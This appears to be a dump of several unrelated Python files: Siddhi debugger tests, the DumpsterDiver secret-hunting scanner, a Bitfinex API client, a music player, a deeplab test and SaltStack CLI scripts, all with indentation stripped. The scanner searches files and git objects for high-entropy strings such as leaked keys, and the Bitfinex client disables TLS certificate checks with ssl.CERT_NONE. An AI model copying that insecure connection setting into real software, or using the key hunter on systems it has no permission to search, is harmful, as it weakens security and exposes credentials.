_self_shaddow.assertTrue(self.queryOneResumed.get(),"Query 2 thread entered the checkpoint before query 1 is debugged")
_self_shaddow.assertListEqual(["IBM", 45.0, 80], event.getOutputData(),"Incorrect debug event received")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
def thread1_worker():
cseEventStreamInputHandler.send(["WSO2", 50.0, 60])
thread1 = threading.Thread(target=thread1_worker)
thread1.start()
def thread2_worker():
stockEventStreamInputHandler.send(["IBM", 45.0, 80])
thread2 = threading.Thread(target=thread2_worker)
thread2.start()
sleep(2)
self.assertEquals(2, self.inEventCount.get(),"Invalid number of output events")
self.assertEquals(4, self.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_set_debugger_callback(self):
logging.info("Siddi Debugger Wrapper Test 1: Set Debugger Callback")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query 1') from cseEventStream select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class StreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", StreamCallbackImpl()) # Causes GC Error
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
#Callback1
class SiddhiDebuggerCallbackImpl1(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
else:
# No more events should be received
_self_shaddow.fail("The callback has not been released")
debugger.play()
#Callback2
class SiddhiDebuggerCallbackImpl2(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 2:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
else:
# No more events should be received
_self_shaddow.fail("Invalid event count")
debugger.play()
siddhiDebugger.acquireBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl1())
inputHandler.send(["WSO2", 50.0, 60])
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl2())
inputHandler.send(["WSO2", 70.0, 40])
self.assertEquals(2, _self_shaddow.inEventCount.get(), "Invalid number of output events")
self.assertEquals(2, _self_shaddow.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_acquire_release_breakpoint(self):
logging.info("Siddi Debugger Wrapper Test 2: Acquire and Release Break Point")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query 1') from cseEventStream select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class StreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", StreamCallbackImpl()) #Causes GC Error
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName,queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60],event.getOutputData(),"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEquals("query 1OUT", queryName + queryTerminal.name,"Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60],event.getOutputData(),"Incorrect debug event received at IN")
else:
#No more events should be received
_self_shaddow.fail("The breakpoint has not been released")
debugger.play()
siddhiDebugger.acquireBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
siddhiDebugger.releaseBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, _self_shaddow.inEventCount.get(), "Invalid number of output events")
self.assertEquals(1, _self_shaddow.debugEventCount.get(),"Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
if __name__ == '__main__':
unittest.main()
#TODO: Test 11: Improve write-backs
#TODO: Add a test on ComplexEvent
|
core.py
|
#!/bin/env python
import yaml
import multiprocessing
import math
import os
import tarfile
import zipfile
import time
import fnmatch
import zlib
import logging
import advancedSearch
from termcolor import colored
CONFIG = yaml.safe_load(open('config.yaml'))
BASE64_CHARS = CONFIG['base64_chars']
PATH = './'
ARCHIVE_TYPES = CONFIG['archive_types']
EXCLUDED = CONFIG['excluded']
REMOVE_FLAG = False
ADVANCED_SEARCH = False
LOGFILE = CONFIG['logfile']
MIN_KEY_LENGTH = CONFIG['min_key_length']
MAX_KEY_LENGTH = CONFIG['max_key_length']
HIGH_ENTROPY_EDGE = CONFIG['high_entropy_edge']
logging.basicConfig(filename=LOGFILE, level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(name)s %(message)s')
logger=logging.getLogger(__name__)
queue = multiprocessing.Manager().Queue()
def log(msg, log_type='error'):
if log_type == 'error':
logger.error(msg)
elif log_type == 'info':
logger.info(msg)
def mp_handler():
jobs = []
# Depending on your hardware, DumpsterDiver will use all available cores
for i in range(multiprocessing.cpu_count()):
pro = [multiprocessing.Process(target=worker) for i in range(queue.qsize())]
for p in pro:
p.daemon = True
p.start()
jobs.append(p)
for job in jobs:
job.join()
job.terminate()
def worker():
_file = queue.get()
analyzer(_file)
queue.task_done()
def analyzer(_file):
try:
entropy_found = False
rule_triggerred = False
if ADVANCED_SEARCH:
additional_checks = advancedSearch.AdvancedSearch()
additional_checks.filetype_check(_file)
for word in file_reader(_file):
base64_strings = get_strings(word)
for string in base64_strings:
b64Entropy = shannon_entropy(string)
if b64Entropy > HIGH_ENTROPY_EDGE:
#print(string + 'has entropy ' + str(b64Entropy))
print(colored('FOUND HIGH ENTROPY!!!', 'green'))
print(colored('The following string: ', 'green') + colored(string, 'magenta') + colored(' has been found in ' + _file, 'green'))
logger.info('high entropy has been found in a file ' + _file)
entropy_found = True
if ADVANCED_SEARCH:
additional_checks.grepper(word)
if ADVANCED_SEARCH:
rule_triggerred = additional_checks.final(_file)
if REMOVE_FLAG and not (entropy_found or rule_triggerred): remove_file(_file)
except Exception as e:
logger.error('while trying to analyze ' + str(_file) + '. Details:\n' + str(e))
def file_reader(_file):
try:
with open(_file, 'r') as f:
while True:
buf = f.read(1024)
if not buf:
break
while not str.isspace(buf[-1]):
ch = f.read(1)
if not ch:
break
buf += ch
words = buf.split()
for word in words:
yield word
f.close()
except Exception as e:
print(colored('Cannot read ' + _file,'red'))
log('while trying to read ' + str(_file) + '. Details:\n' + str(e))
def folder_reader(path):
try:
for root, subfolder, files in os.walk(path):
for filename in files:
extension = os.path.splitext(filename)[1]
_file = root + '/' + filename
#check if it is archive
if extension in EXCLUDED:
                    # remove unnecessary files
if REMOVE_FLAG:
_file = root + '/' + filename
remove_file(_file)
elif extension in ARCHIVE_TYPES:
archive = root + '/' + filename
folder_reader(extract_archive(archive))
elif extension == '' and ('.git/objects/' in _file):
try:
with open(_file, 'rb') as f:
                            # git loose objects are zlib-compressed; check the first 2 bytes for a zlib header (b'x\x01')
if f.read(2) == b'x\x01':
decompressed = git_object_reader(_file)
if decompressed:
queue.put(decompressed)
f.close()
except Exception as e:
logger.error(e)
else:
queue.put(_file)
except Exception as e:
logger.error(e)
def remove_file(_file):
try:
os.remove(_file)
except Exception as e:
logger.error(e)
def extract_archive(archive):
try:
if archive.endswith('.zip'):
opener, mode = zipfile.ZipFile, 'r'
elif archive.endswith('.tar.gz') or archive.endswith('.tgz'):
opener, mode = tarfile.open, 'r:gz'
elif archive.endswith('.tar.bz2') or archive.endswith('.tbz'):
opener, mode = tarfile.open, 'r:bz2'
else:
logger.info('Cannot open archive ' + archive)
cwd = os.getcwd()
#in case one archive contains another archive with the same name I used epoch time as the name for each extracted archive
extracted_folder = cwd + '/Extracted_files/' + str(time.time())
os.makedirs(extracted_folder)
os.chdir(extracted_folder)
_file = opener(archive, mode)
try: _file.extractall()
except Exception as e:
print(colored('Cannot unpack ' + archive + ' archive', 'red'))
logger.error(e)
finally: _file.close()
except Exception as e:
logger.error(e)
finally:
os.chdir(cwd)
return extracted_folder
def start_the_hunt():
folder_reader(PATH)
mp_handler()
def shannon_entropy(data):
'''
Borrowed from http://blog.dkbza.org/2007/05/scanning-data-for-entropy-anomalies.html
'''
try:
if not data:
return 0
entropy = 0
for x in BASE64_CHARS:
p_x = float(data.count(x))/len(data)
if p_x > 0:
entropy += - p_x*math.log(p_x, 2)
return entropy
except Exception as e:
logger.error(e)
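# A small worked example of the entropy measure above (illustrative sketch; the real
# threshold is HIGH_ENTROPY_EDGE from config.yaml). A single repeated character scores
# 0 bits, while a random-looking token approaches log2(number of distinct characters).
def _entropy_demo():
    print(shannon_entropy('aaaaaaaaaaaaaaaa'))                    # 0.0
    print(shannon_entropy('ZWVTjPQSdhwRgl204Hc51YCsritMIzn8B='))  # roughly 5 bits per character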
def get_strings(word):
try:
count = 0
letters = ''
strings = []
for char in word:
if char in BASE64_CHARS:
letters += char
count += 1
else:
if MAX_KEY_LENGTH >= count >= MIN_KEY_LENGTH-1:
strings.append(letters)
letters = ''
count = 0
if MAX_KEY_LENGTH >= count >= MIN_KEY_LENGTH-1:
strings.append(letters)
return strings
except Exception as e:
logger.error(e)
def git_object_reader(_file):
try:
git_object = open(_file, 'rb').read()
decompressed = zlib.decompress(git_object)
new_file = _file + '_decompressed'
with open(new_file, 'w') as decompressed_file:
decompressed_file.write(str(decompressed))
decompressed_file.close()
return new_file
except Exception as e:
logger.error(e)
|
vnbitfinex.py
|
# encoding: UTF-8
import json
import requests
import traceback
import ssl
from threading import Thread
from queue import Queue, Empty
import websocket
WEBSOCKET_V2_URL = 'wss://api.bitfinex.com/ws/2'
RESTFUL_V1_URL = 'https://api.bitfinex.com/v1'
########################################################################
class BitfinexApi(object):
""""""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.ws = None
self.thread = None
self.active = False
self.restQueue = Queue()
self.restThread = None
#----------------------------------------------------------------------
def start(self):
""""""
self.ws = websocket.create_connection(WEBSOCKET_V2_URL,
sslopt={'cert_reqs': ssl.CERT_NONE})
self.active = True
self.thread = Thread(target=self.run)
self.thread.start()
self.restThread = Thread(target=self.runRest)
self.restThread.start()
self.onConnect()
#----------------------------------------------------------------------
def reconnect(self):
""""""
self.ws = websocket.create_connection(WEBSOCKET_V2_URL,
sslopt={'cert_reqs': ssl.CERT_NONE})
self.onConnect()
#----------------------------------------------------------------------
def run(self):
""""""
while self.active:
try:
stream = self.ws.recv()
data = json.loads(stream)
self.onData(data)
except:
msg = traceback.format_exc()
self.onError(msg)
self.reconnect()
#----------------------------------------------------------------------
def close(self):
""""""
self.active = False
if self.thread:
self.thread.join()
if self.restThread:
            self.restThread.join()
#----------------------------------------------------------------------
def onConnect(self):
""""""
        print('connected')
#----------------------------------------------------------------------
def onData(self, data):
""""""
        print(data)
#----------------------------------------------------------------------
def onError(self, msg):
""""""
        print(msg)
#----------------------------------------------------------------------
def sendReq(self, req):
""""""
self.ws.send(json.dumps(req))
#----------------------------------------------------------------------
def sendRestReq(self, path, callback):
""""""
self.restQueue.put((path, callback))
#----------------------------------------------------------------------
def runRest(self):
""""""
while self.active:
try:
path, callback = self.restQueue.get(timeout=1)
self.httpGet(path, callback)
except Empty:
pass
#----------------------------------------------------------------------
def httpGet(self, path, callback):
""""""
url = RESTFUL_V1_URL + path
resp = requests.get(url)
callback(resp.json())
if __name__ == '__main__':
api = BitfinexApi()
api.start()
d = {
'event': 'subscribe',
'channel': 'book',
'symbol': 'BTCUSD'
}
api.sendReq(d)
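    # Illustrative REST call (assumption: '/pubticker/btcusd' is a valid public v1 endpoint);
    # the callback simply prints the decoded JSON reply when the REST worker thread processes it.
    api.sendRestReq('/pubticker/btcusd', lambda data: print(data))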
    input()
|
local_player.py
|
from typing import List
from threading import Thread
from time import sleep
from pygame import mixer, time
from src.internal.app.interfaces.player import Player
from src.internal.domain.music.playlist import Playlist
from src.internal.domain.music.song import Song
CONTINUOUS_LOOP = 1000000
class LocalPlayer(Player):
"""
Adapter for playing songs from your local drive.
Implements Player interface
"""
shouldStop: bool
skippedSongs: List[Song]
"""
LocalPlayer is used for handling local playlists and songs from hard drive.
"""
def __init__(self):
self.shouldStop = False
self.skippedSongs = []
mixer.init()
def PlayPlaylistInLoop(self, playlist: Playlist):
self.PlayPlaylistOnce(playlist, CONTINUOUS_LOOP)
def PlayPlaylistOnce(self, playlist: Playlist, loops=1):
"""
Uses multithreading to ensure non-blocking playback and enables stop functionality with refunds
:param playlist:
:param loops:
:return:
"""
self.skippedSongs = playlist.Songs()[1:]
def play():
for _ in range(loops):
mixer.music.unload()
songs = playlist.Songs()
mixer.music.load(songs[0].Path())
for song in songs[1:]:
mixer.music.queue(song.Path())
mixer.music.play()
while mixer.music.get_busy():
if self.shouldStop:
mixer.music.stop()
self.shouldStop = False
return
time.wait(200)
def countCost():
for s in playlist.Songs():
sleep(s.Length().Seconds())
if len(self.skippedSongs) > 0:
self.skippedSongs = self.skippedSongs[1:]
Thread(target=play).start()
Thread(target=countCost).start()
def PlaySongInLoop(self, song: Song):
self.PlaySongOnce(song, CONTINUOUS_LOOP)
def PlaySongOnce(self, song: Song, loops=0):
mixer.music.unload()
mixer.music.load(song.Path())
mixer.music.play(loops=loops)
def Stop(self):
self.shouldStop = True
time.wait(500)
mixer.music.stop()
def SkippedSongs(self) -> List[Song]:
return self.skippedSongs
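# Minimal usage sketch (hypothetical: `my_playlist` stands for a Playlist instance built
# from the project's domain objects, which this module does not construct itself):
#
#   player = LocalPlayer()
#   player.PlayPlaylistOnce(my_playlist)   # returns immediately; playback runs in background threads
#   ...
#   player.Stop()                          # asks the playback thread to halt, forces the mixer to stop after ~500 ms
#   refund_candidates = player.SkippedSongs()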
|
deeplab_train_test.py
|
#!/usr/bin/env python
# run "pytest deeplab_train_test.py " or "pytest " for test, add " -s for allowing print out"
# "pytest can automatically search *_test.py files "
# import unittest
import os, sys
import time
from multiprocessing import Process
# the path of Landuse_DL
# code_dir = os.path.expanduser('~/codes/PycharmProjects/Landuse_DL')
code_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..') # get path of deeplab_train_test.py
print(code_dir)
sys.path.insert(0, code_dir)
import parameters
work_dir = os.path.expanduser('~/codes/PycharmProjects/Landuse_DL/working_dir')
os.chdir(work_dir)
para_file = 'main_para.ini'
import workflow.deeplab_train as deeplab_train
class TestdeeplabTrainclass():
# cannot collect test class 'TestdeeplabTrainclass' because it has a __init__ constructor
# def __init__(self):
# self.work_dir = None
# self.code_dir = None
# self.para_file = None
# def test_get_train_val_sample_count(self):
#
# print(deeplab_train.get_train_val_sample_count(work_dir, para_file))
#
# def test_get_trained_iteration(self):
# train_log_dir = os.path.join(work_dir, 'exp1', 'train')
# iter = deeplab_train.get_trained_iteration(train_log_dir)
# print('iteration number in the folder', iter)
# def test_get_miou_spep_list(self):
# train_log_dir = os.path.join(work_dir, 'exp1', 'eval')
# dict = deeplab_train.get_miou_list_class_all(train_log_dir,2)
# print(dict)
#
# def test_get_loss_list(self):
# train_log_dir = os.path.join(work_dir, 'exp1', 'train')
# dict = deeplab_train.get_loss_learning_rate_list(train_log_dir)
# print(dict)
# def test_evaluation_deeplab(self):
#
# # run this test "pytest -s deeplab_train_test.py" in
# # ~/Data/Arctic/canada_arctic/autoMapping/multiArea_deeplabV3+_6 or other working folder (with trained model and data avaible)
#
# para_file = 'main_para.ini'
#
# if os.path.isfile(para_file) is False:
# raise IOError('File %s not exists in current folder: %s' % (para_file, os.getcwd()))
#
# network_setting_ini = parameters.get_string_parameters(para_file, 'network_setting_ini')
# tf_research_dir = parameters.get_directory_None_if_absence(network_setting_ini, 'tf_research_dir')
# print(tf_research_dir)
# if tf_research_dir is None:
# raise ValueError('tf_research_dir is not in %s' % para_file)
# if os.path.isdir(tf_research_dir) is False:
# raise ValueError('%s does not exist' % tf_research_dir)
#
# if os.getenv('PYTHONPATH'):
# os.environ['PYTHONPATH'] = os.getenv('PYTHONPATH') + ':' + tf_research_dir + ':' + os.path.join(
# tf_research_dir,
# 'slim')
# else:
# os.environ['PYTHONPATH'] = tf_research_dir + ':' + os.path.join(tf_research_dir, 'slim')
#
# global tf1x_python
# tf1x_python = parameters.get_file_path_parameters(network_setting_ini, 'tf1x_python')
#
# WORK_DIR = os.getcwd()
# expr_name = parameters.get_string_parameters(para_file, 'expr_name')
# deeplab_dir = os.path.join(tf_research_dir, 'deeplab')
#
# # prepare training folder
# EXP_FOLDER = expr_name
# TRAIN_LOGDIR = os.path.join(WORK_DIR, EXP_FOLDER, 'train')
# EVAL_LOGDIR = os.path.join(WORK_DIR, EXP_FOLDER, 'eval')
#
# dataset_dir = os.path.join(WORK_DIR, 'tfrecord')
#
# inf_output_stride = parameters.get_digit_parameters_None_if_absence(network_setting_ini, 'inf_output_stride','int')
# inf_atrous_rates1 = parameters.get_digit_parameters_None_if_absence(network_setting_ini, 'inf_atrous_rates1','int')
# inf_atrous_rates2 = parameters.get_digit_parameters_None_if_absence(network_setting_ini, 'inf_atrous_rates2', 'int')
# inf_atrous_rates3 = parameters.get_digit_parameters_None_if_absence(network_setting_ini, 'inf_atrous_rates3','int')
#
# # depth_multiplier default is 1.0.
# depth_multiplier = parameters.get_digit_parameters_None_if_absence(network_setting_ini, 'depth_multiplier','float')
#
# decoder_output_stride = parameters.get_digit_parameters_None_if_absence(network_setting_ini,'decoder_output_stride', 'int')
# aspp_convs_filters = parameters.get_digit_parameters_None_if_absence(network_setting_ini, 'aspp_convs_filters','int')
#
#
# model_variant = parameters.get_string_parameters(network_setting_ini, 'model_variant')
#
#
# dataset = parameters.get_string_parameters(para_file, 'dataset_name')
# num_classes_noBG = parameters.get_digit_parameters_None_if_absence(para_file, 'NUM_CLASSES_noBG', 'int')
#
# num_of_classes = num_classes_noBG + 1
# num_of_classes = 21 # for test
#
# image_crop_size = parameters.get_string_list_parameters(para_file, 'image_crop_size')
# if len(image_crop_size) != 2 and image_crop_size[0].isdigit() and image_crop_size[1].isdigit():
# raise ValueError('image_crop_size should be height,width')
# crop_size_str = ','.join(image_crop_size)
#
# evl_script = os.path.join(deeplab_dir, 'eval.py')
# evl_split = os.path.splitext(parameters.get_string_parameters(para_file, 'validation_sample_list_txt'))[0]
# max_eva_number = 1
#
# # run evaluation
# deeplab_train.evaluation_deeplab(evl_script,dataset, evl_split, num_of_classes,model_variant,
# inf_atrous_rates1,inf_atrous_rates2,inf_atrous_rates3,inf_output_stride,TRAIN_LOGDIR, EVAL_LOGDIR,
# dataset_dir,crop_size_str, max_eva_number,depth_multiplier,decoder_output_stride,aspp_convs_filters)
# this is easy to kill
def calculation(self):
a = 0
while a < 1000:
a += 1
print(a)
time.sleep(1)
    # start a sub-process that cannot be ended by kill or terminate;
    # need to output the pid inside the sub-process, then read it and kill it.
def run_a_subprocess(self):
res = os.system('ping localhost') # subprocess
def test_Process(self):
# eval_process = Process(target=self.calculation)
eval_process = Process(target=self.run_a_subprocess)
out_start = eval_process.start()
print('out_start',out_start)
print('pid',eval_process.pid)
os_pid = os.getpid()
print('os_pid', os_pid)
pid = os.getpid()
with open('train_py_pid.txt', 'w') as f_obj:
f_obj.writelines('%d' % pid)
with open('train_py_pid.txt', 'r') as f_obj:
lines = f_obj.readlines()
pid = int(lines[0].strip())
print('read_pid', pid)
time.sleep(5)
eval_process.kill()
# eval_process.terminate()
time.sleep(3)
print('is alive?',eval_process.is_alive())
if __name__ == '__main__':
pass
|
scripts.py
|
# -*- coding: utf-8 -*-
'''
This module contains the function calls to execute command line scripts
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import sys
import time
import signal
import logging
import functools
import threading
import traceback
from random import randint
# Import salt libs
from salt.exceptions import SaltSystemExit, SaltClientError, SaltReqTimeoutError
import salt.defaults.exitcodes # pylint: disable=unused-import
log = logging.getLogger(__name__)
def _handle_interrupt(exc, original_exc, hardfail=False, trace=''):
'''
    If hardfailing:
        if we got the original stacktrace, log it;
        in all cases, raise the original exception,
        as it is logically part of the initial stack.
    Else, just let salt exit gracefully.
'''
if hardfail:
if trace:
log.error(trace)
raise original_exc
else:
raise exc
def _handle_signals(client, signum, sigframe):
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
Exception('\nExiting with hard crash Ctrl-c'),
hardcrash, trace=trace)
def _install_signal_handlers(client):
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, functools.partial(_handle_signals, client))
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
        signal.signal(signal.SIGTERM, functools.partial(_handle_signals, client))
def salt_master():
'''
Start the salt master.
'''
import salt.cli.daemons
master = salt.cli.daemons.Master()
master.start()
def minion_process():
'''
Start a minion process
'''
import salt.utils
import salt.cli.daemons
# salt_minion spawns this function in a new process
salt.utils.appendproctitle('KeepAlive')
def handle_hup(manager, sig, frame):
manager.minion.reload()
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
        NOTE: there is a small race issue where the parent PID could be replaced
        with another process with the same PID!
'''
while True:
time.sleep(5)
try:
# check pid alive (Unix only trick!)
if os.getuid() == 0 and not salt.utils.is_windows():
os.kill(parent_pid, 0)
except OSError as exc:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
log.error('Minion process encountered exception: {0}'.format(exc))
os._exit(salt.defaults.exitcodes.EX_GENERIC)
if not salt.utils.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
minion = salt.cli.daemons.Minion()
signal.signal(signal.SIGHUP,
functools.partial(handle_hup,
minion))
try:
minion.start()
except (SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
log.warning('Fatal functionality error caught by minion handler:\n', exc_info=True)
log.warning('** Restarting minion **')
delay = 60
if minion is not None and hasattr(minion, 'config'):
delay = minion.config.get('random_reauth_delay', 60)
delay = randint(1, delay)
log.info('waiting random_reauth_delay {0}s'.format(delay))
time.sleep(delay)
sys.exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
def salt_minion():
'''
Start the salt minion in a subprocess.
Auto restart minion on error.
'''
import signal
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.is_windows():
minion = salt.cli.daemons.Minion()
minion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
minion = salt.cli.daemons.Minion()
minion.start()
return
def escalate_signal_to_process(pid, signum, sigframe): # pylint: disable=unused-argument
'''
Escalate the signal received to the multiprocessing process that
is actually running the minion
'''
# escalate signal
os.kill(pid, signum)
# keep one minion subprocess running
prev_sigint_handler = signal.getsignal(signal.SIGINT)
prev_sigterm_handler = signal.getsignal(signal.SIGTERM)
while True:
try:
process = multiprocessing.Process(target=minion_process)
process.start()
signal.signal(signal.SIGTERM,
functools.partial(escalate_signal_to_process,
process.pid))
signal.signal(signal.SIGINT,
functools.partial(escalate_signal_to_process,
process.pid))
signal.signal(signal.SIGHUP,
functools.partial(escalate_signal_to_process,
process.pid))
except Exception: # pylint: disable=broad-except
# if multiprocessing does not work
minion = salt.cli.daemons.Minion()
minion.start()
break
process.join()
# Process exited or was terminated. Since we're going to try to restart
# it, we MUST, reset signal handling to the previous handlers
signal.signal(signal.SIGINT, prev_sigint_handler)
signal.signal(signal.SIGTERM, prev_sigterm_handler)
if not process.exitcode == salt.defaults.exitcodes.SALT_KEEPALIVE:
sys.exit(process.exitcode)
        # on top of the random_reauth_delay already performed
# delay extra to reduce flooding and free resources
# NOTE: values are static but should be fine.
time.sleep(2 + randint(1, 10))
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def proxy_minion_process(queue):
'''
Start a proxy minion process
'''
import salt.cli.daemons
# salt_minion spawns this function in a new process
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
        NOTE: there is a small race issue where the parent PID could be replaced
with another process with the same PID!
'''
while True:
time.sleep(5)
try:
# check pid alive (Unix only trick!)
os.kill(parent_pid, 0)
except OSError:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
os._exit(999)
if not salt.utils.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
restart = False
proxyminion = None
status = salt.defaults.exitcodes.EX_OK
try:
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
log.error('Proxy Minion failed to start: ', exc_info=True)
restart = True
# status is superfluous since the process will be restarted
status = salt.defaults.exitcodes.SALT_KEEPALIVE
except SystemExit as exc:
restart = False
status = exc.code
if restart is True:
log.warning('** Restarting proxy minion **')
delay = 60
if proxyminion is not None:
if hasattr(proxyminion, 'config'):
delay = proxyminion.config.get('random_reauth_delay', 60)
random_delay = randint(1, delay)
log.info('Sleeping random_reauth_delay of {0} seconds'.format(random_delay))
        # perform delay after minion resources have been cleaned
queue.put(random_delay)
else:
queue.put(0)
sys.exit(status)
def salt_proxy_minion():
'''
Start a proxy minion.
'''
import salt.cli.daemons
import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.is_windows():
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
# keep one minion subprocess running
while True:
try:
queue = multiprocessing.Queue()
except Exception:
# This breaks in containers
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
process = multiprocessing.Process(target=proxy_minion_process, args=(queue,))
process.start()
try:
process.join()
try:
restart_delay = queue.get(block=False)
except Exception:
if process.exitcode == 0:
# Minion process ended naturally, Ctrl+C or --version
break
restart_delay = 60
if restart_delay == 0:
# Minion process ended naturally, Ctrl+C, --version, etc.
sys.exit(process.exitcode)
# delay restart to reduce flooding and allow network resources to close
time.sleep(restart_delay)
except KeyboardInterrupt:
break
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def salt_syndic():
'''
Start the salt syndic.
'''
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
pid = os.getpid()
try:
syndic = salt.cli.daemons.Syndic()
syndic.start()
except KeyboardInterrupt:
os.kill(pid, 15)
def salt_key():
'''
Manage the authentication keys with salt-key.
'''
import salt.cli.key
try:
client = salt.cli.key.SaltKey()
_install_signal_handlers(client)
client.run()
except Exception as err:
sys.stderr.write("Error: {0}\n".format(err))
def salt_cp():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.cp
client = salt.cli.cp.SaltCPCli()
_install_signal_handlers(client)
client.run()
def salt_call():
'''
Directly call a salt command in the modules, does not require a running
salt minion to run.
'''
import salt.cli.call
if '' in sys.path:
sys.path.remove('')
client = salt.cli.call.SaltCall()
_install_signal_handlers(client)
client.run()
def salt_run():
'''
Execute a salt convenience routine.
'''
import salt.cli.run
if '' in sys.path:
sys.path.remove('')
client = salt.cli.run.SaltRun()
_install_signal_handlers(client)
client.run()
def salt_ssh():
'''
Execute the salt-ssh system
'''
import salt.cli.ssh
if '' in sys.path:
sys.path.remove('')
try:
client = salt.cli.ssh.SaltSSH()
_install_signal_handlers(client)
client.run()
except SaltClientError as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit(err),
err,
hardcrash, trace=trace)
def salt_cloud():
'''
The main function for salt-cloud
'''
try:
# Late-imports for CLI performance
import salt.cloud
import salt.cloud.cli
has_saltcloud = True
except ImportError as e:
log.error("Error importing salt cloud {0}".format(e))
# No salt cloud on Windows
has_saltcloud = False
if '' in sys.path:
sys.path.remove('')
if not has_saltcloud:
print('salt-cloud is not available in this system')
sys.exit(salt.defaults.exitcodes.EX_UNAVAILABLE)
client = salt.cloud.cli.SaltCloud()
_install_signal_handlers(client)
client.run()
def salt_api():
'''
The main function for salt-api
'''
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.api
